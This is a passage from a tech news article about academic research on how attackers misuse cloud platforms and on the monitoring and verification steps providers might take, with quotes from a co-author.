The boffins identified several common attack scenarios in a companion paper, “Launching Stealth Attacks using Cloud” [PDF].
Wakey-wakey! A quarter of IT pros only get 3-4 hours’ kip – and you won’t believe what’s being touted as the ‘solution’
It outlines attack scenarios like using cloud platforms for phishing, DDoS, password cracking, rogue services, and other operations like running command-and-control servers. It also covers setting up an example attack server using Oracle VirtualBox and Kali Linux.
Both papers are scheduled to appear at the IEEE Computer Society Signature Conference on Computers, Software and Application (COMPSAC 2020) in July.
The researchers suggest some ways cloud providers might deal with abuse more effectively. One involves better customer identity verification through background checks. The availability of websites offering fake credit card numbers, the researchers say, makes it easy to create cloud accounts anonymously.
They also suggest better tracking of network usage and more intelligent VM monitoring to detect suspicious accounts. Cloud providers, they say, can enforce the use of firewalls, encourage software updates on VMs to protect against vulnerabilities, and create trusted software repositories to limit the availability of attack tools on their platforms.
Such measures, however, would impose costs on cloud providers and might alienate customers if the oversight is too heavy-handed.
Akbar Siami-Namin, associate professor of computer science at Texas Tech University and a co-author of the two papers, told The Reg there are both technical and business challenges cloud providers need to deal with.
“Security and particularly addition of security controls to infrastructure means additional costs,” he said. “It also negatively impacts the ‘usability’ of the underlying systems. In the cloud platform, since it is a distributed environment, it is super hard to define a solid fortress in order to prevent adversaries from abusing it.”
He also pointed to the business challenges entailed by adding friction to the customer acquisition process.
“Individuals are less likely to try something on the cloud, if the cloud is asking for so much private information such as credit card, name, address, etc,” he said. “Therefore, the cloud providers offer some sort of basic computation power as ‘free’ with the hope that the potential customers (individuals) become regular customers for their cloud platforms (a long range investment).”
Those who would abuse cloud systems, he said, take advantage of this goodwill gesture.
“The cloud providers are aware of this issue,” Siami-Namin said. However, from a technical point of view, it is hard to make the system bullet-proof and protected from attacks and abuse. As pointed out in our papers, perhaps they need a more mature, resilient, and monitoring tracking system empowered with AI and automated detection to identify these abuses.” ®